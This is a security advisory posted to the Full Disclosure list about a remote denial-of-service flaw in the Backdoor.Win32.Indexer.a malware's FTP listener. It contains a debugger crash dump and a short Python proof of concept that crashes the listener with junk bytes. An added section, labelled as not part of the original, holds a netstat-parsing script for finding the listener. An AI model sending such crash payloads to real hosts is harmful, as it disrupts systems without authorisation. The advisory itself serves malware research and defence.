Date: Tue, 16 Feb 2021 00:04:32 -0500
From: malvuln <malvuln13@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Backdoor.Win32.Indexer.a / Remote Denial Of Service

Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source:
https://malvuln.com/advisory/2b576e7551afe1c7575dc680396f1b5b_B.txt
Contact: malvuln13@...il.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Indexer.a
Vulnerability: Remote Denial Of Service
Description: Indexer.a runs an FTP server that listens on TCP port
47885. Sending it an unexpected payload of junk characters causes an
unhandled exception, resulting in a crash and denial of service.
Type: PE32
MD5: 2b576e7551afe1c7575dc680396f1b5b
Vuln ID: MVID-2021-0092
Dropped files:
Disclosure: 02/16/2021
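A host-side check for the listener described above, added here as an example and not part of the original advisory: it parses Windows `netstat -ano` output and reports any process bound to TCP 47885 in LISTENING state, so a responder can pivot to the PID. The netstat sample is constructed, not a real capture.

```python
import re
from typing import Dict, List

# TCP port the Backdoor.Win32.Indexer.a FTP listener binds (from the advisory).
INDEXER_FTP_PORT = 47885

# Constructed sample of `netstat -ano` output on a Windows host (not a real capture).
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    0.0.0.0:47885          0.0.0.0:0              LISTENING       4172
  TCP    192.168.1.20:49712     52.97.133.34:443       ESTABLISHED     2260
  TCP    [::]:47885             [::]:0                 LISTENING       4172
  UDP    0.0.0.0:5353           *:*                                    1540
"""

# One netstat row: proto, local, foreign, optional state (UDP rows have none), PID.
LINE_RE = re.compile(
    r"^\s*(?P<proto>TCP|UDP)\s+(?P<local>\S+)\s+(?P<remote>\S+)\s+"
    r"(?:(?P<state>[A-Z_]+)\s+)?(?P<pid>\d+)\s*$"
)


def split_addr(addr: str):
    """Split 'host:port' (IPv4 or bracketed IPv6) into (host, port)."""
    host, _, port = addr.rpartition(":")
    return host, int(port)


def parse_netstat(text: str) -> List[Dict]:
    """Parse netstat -ano text into dicts; header and blank lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        host, port = split_addr(m.group("local"))
        rows.append({"proto": m.group("proto"), "host": host, "port": port,
                     "state": m.group("state") or "", "pid": int(m.group("pid"))})
    return rows


def find_listeners(text: str, port: int = INDEXER_FTP_PORT) -> List[Dict]:
    """Return TCP sockets in LISTENING state bound to `port` (IPv4 and IPv6)."""
    return [r for r in parse_netstat(text)
            if r["proto"] == "TCP" and r["port"] == port and r["state"] == "LISTENING"]


if __name__ == "__main__":
    for hit in find_listeners(SAMPLE_NETSTAT):
        print(f"PID {hit['pid']} listens on {hit['host']}:{hit['port']}; "
              f"inspect it with: tasklist /FI \"PID eq {hit['pid']}\"")
```

On a live host, feed the real output of `netstat -ano` to `find_listeners` instead of the constructed sample.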

Memory Dump:
(1618.14b0): Unknown exception - code 0eedfade (first/second chance
not available)
eax=00000000 ebx=00000000 ecx=00000007 edx=00000000 esi=00000003 edi=00000003
eip=7710ed3c esp=0019f460 ebp=0019f5f0 iopl=0         nv up ei pl nz ac pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000216
ntdll!ZwWaitForMultipleObjects+0xc:
7710ed3c c21400          ret     14h

0:000> !analyze -v
*******************************************************************************
*                                                                             *
*                        Exception Analysis                                   *
*                                                                             *
*******************************************************************************


FAULTING_IP:
KERNELBASE!RaiseException+62
75eb08f2 8b4c2454        mov     ecx,dword ptr [esp+54h]

EXCEPTION_RECORD:  ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 75eb08f2 (KERNELBASE!RaiseException+0x00000062)
   ExceptionCode: 0eedfade
  ExceptionFlags: 00000001
NumberParameters: 7
   Parameter[0]: 004129ae
   Parameter[1]: 04105d4c
   Parameter[2]: 04105dc8
   Parameter[3]: 00000000
   Parameter[4]: 00000000
   Parameter[5]: 0019fe9c
   Parameter[6]: 0019fddc

DEFAULT_BUCKET_ID:  DELPHI_EXCEPTION

PROCESS_NAME:  Backdoor.Win32.Indexer.a.2b576e7551afe1c7575dc680396f1b5b.exe

ERROR_CODE: (NTSTATUS) 0xeedfade - <Unable to get error code text>

EXCEPTION_CODE: (Win32) 0xeedfade (250477278) - <Unable to get error code text>

EXCEPTION_PARAMETER1:  004129ae

EXCEPTION_PARAMETER2:  04105d4c

EXCEPTION_PARAMETER3:  04105dc8

EXCEPTION_PARAMETER4: 0

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG:  0

APPLICATION_VERIFIER_FLAGS:  0

FAULTING_THREAD:  000014b0

PRIMARY_PROBLEM_CLASS:  DELPHI_EXCEPTION

BUGCHECK_STR:  APPLICATION_FAULT_DELPHI_EXCEPTION

LAST_CONTROL_TRANSFER:  from 00443345 to 75eb08f2

STACK_TEXT:
0019fdf0 00443345 041050ac 041050ac 0044317f KERNELBASE!RaiseException+0x62
WARNING: Stack unwind information not available. Following frames may be wrong.
0019fe14 0040c70b 0040ba01 04102c70 00443345
Backdoor_Win32_Indexer_a_2b576e7551afe1c7575dc680396f1b5b!Ftpsrvcinitialization$qqrv+0x30009
0019fe20 00443345 04102c70 04102c70 0044317f
Backdoor_Win32_Indexer_a_2b576e7551afe1c7575dc680396f1b5b!FtpsrvTFtpServer$bdtr$qqrv+0x47
0019fe2c 0044317f 00000000 0019fe9c 00000000
Backdoor_Win32_Indexer_a_2b576e7551afe1c7575dc680396f1b5b!Ftpsrvcinitialization$qqrv+0x30009
0019fe44 004311ea 04102200 00000001 0044c7a9
Backdoor_Win32_Indexer_a_2b576e7551afe1c7575dc680396f1b5b!Ftpsrvcinitialization$qqrv+0x2fe43
0019fe50 0044c7a9 0041c253 04102c70 04102c70
Backdoor_Win32_Indexer_a_2b576e7551afe1c7575dc680396f1b5b!Ftpsrvcinitialization$qqrv+0x1deae
0019fe54 0041c253 04102c70 04102c70 04102c70
Backdoor_Win32_Indexer_a_2b576e7551afe1c7575dc680396f1b5b!Ftpsrvcinitialization$qqrv+0x3946d
0044c7a9 52ff108b 84c358e4 c3017fd2 108b5250
Backdoor_Win32_Indexer_a_2b576e7551afe1c7575dc680396f1b5b!Ftpsrvcinitialization$qqrv+0x8f17
0044c7ad 84c358e4 c3017fd2 108b5250 5ae852ff 0x52ff108b
0044c7b1 c3017fd2 108b5250 5ae852ff 8090c358 0x84c358e4
0044c7b5 108b5250 5ae852ff 8090c358 45a9b03d 0xc3017fd2
0044c7b9 5ae852ff 8090c358 45a9b03d 10760100 0x108b5250
0044c7bd 8090c358 45a9b03d 10760100 006a006a 0x5ae852ff
0044c7c1 45a9b03d 10760100 006a006a df68006a 0x8090c358
0044c7c5 10760100 006a006a df68006a e80eedfa 0x45a9b03d
0044c7c9 006a006a df68006a e80eedfa 0000bb7f 0x10760100
0044c7cd df68006a e80eedfa 0000bb7f 809090c3 0x6a006a
0044c7d1 e80eedfa 0000bb7f 809090c3 45a9b03d 0xdf68006a
0044c7d5 00000000 809090c3 45a9b03d 16740000 0xe80eedfa


FOLLOWUP_IP:
Backdoor_Win32_Indexer_a_2b576e7551afe1c7575dc680396f1b5b!Ftpsrvcinitialization$qqrv+30009
00443345 8b7310          mov     esi,dword ptr [ebx+10h]

SYMBOL_STACK_INDEX:  1

SYMBOL_NAME:  backdoor_win32_indexer_a!Ftpsrvcinitialization$qqrv+30009

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: Backdoor_Win32_Indexer_a_2b576e7551afe1c7575dc680396f1b5b

IMAGE_NAME:  Backdoor.Win32.Indexer.a.2b576e7551afe1c7575dc680396f1b5b.exe

DEBUG_FLR_IMAGE_TIMESTAMP:  3814be7c

STACK_COMMAND:  dt ntdll!LdrpLastDllInitializer BaseDllName ; dt
ntdll!LdrpFailureData ; ~0s; .ecxr ; kb

BUCKET_ID:  APPLICATION_FAULT_DELPHI_EXCEPTION_backdoor_win32_indexer_a!Ftpsrvcinitialization$qqrv+30009

FAILURE_BUCKET_ID:
DELPHI_EXCEPTION_eedfade_Backdoor.Win32.Indexer.a.2b576e7551afe1c7575dc680396f1b5b.exe!Ftpsrvcinitialization$qqrv


Exploit/PoC:
from socket import *

MALWARE_HOST="x.x.x.x"   # host running the backdoor's FTP listener
PORT=47885

def doit():
    s=socket(AF_INET, SOCK_STREAM)
    s.connect((MALWARE_HOST, PORT))

    # 256 bytes of junk; must be bytes, not str, under Python 3
    PBARBAR=b"A"*256
    s.send(PBARBAR)
    s.close()

    print("Backdoor.Win32.Indexer.a / Remote Dos")
    print("MD5: 2b576e7551afe1c7575dc680396f1b5b")
    print("By Malvuln")

if __name__=="__main__":
    doit()



Disclaimer: The information contained within this advisory is supplied
"as-is" with no warranties or guarantees of fitness of use or
otherwise. Permission is hereby granted for the redistribution of this
advisory, provided that it is not altered except by reformatting it,
and that due credit is given. Permission is explicitly given for
insertion in vulnerability databases and similar, provided that due
credit is given to the author. The author is not responsible for any
misuse of the information contained herein and accepts no
responsibility for any damage caused by the use or misuse of this
information. The author prohibits any malicious use of security
related information or exploits by the author or elsewhere. Do not
attempt to download Malware samples. The author of this website takes
no responsibility for any kind of damages occurring from improper
Malware handling or the downloading of ANY Malware mentioned on this
website or elsewhere. All content Copyright (c) Malvuln.com (TM).

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
